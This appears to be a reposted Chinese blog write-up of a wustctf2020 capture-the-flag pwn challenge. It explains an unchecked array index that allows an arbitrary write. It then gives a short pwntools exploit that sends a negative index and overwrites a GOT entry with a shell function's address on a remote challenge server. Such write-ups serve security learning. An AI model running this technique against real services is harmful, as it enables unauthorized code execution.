wustctf2020

wustctf2020,第1张

这里存在数组越界,没有进行检查,所以我们可以任意地址写,这里写got为shell即可

from pwn import *
p = remote("node4.buuoj.cn",27085)

shell = 0x080485CB
p.sendlineafter(">",'-7')
p.sendlineafter("Give your name plz: ",p32(shell))
p.interactive()

 

欢迎分享,转载请注明来源:内存溢出

原文地址:https://54852.com/langs/726519.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2022-04-26
下一篇2022-04-26

发表评论

登录后才能评论

评论列表(0条)

    保存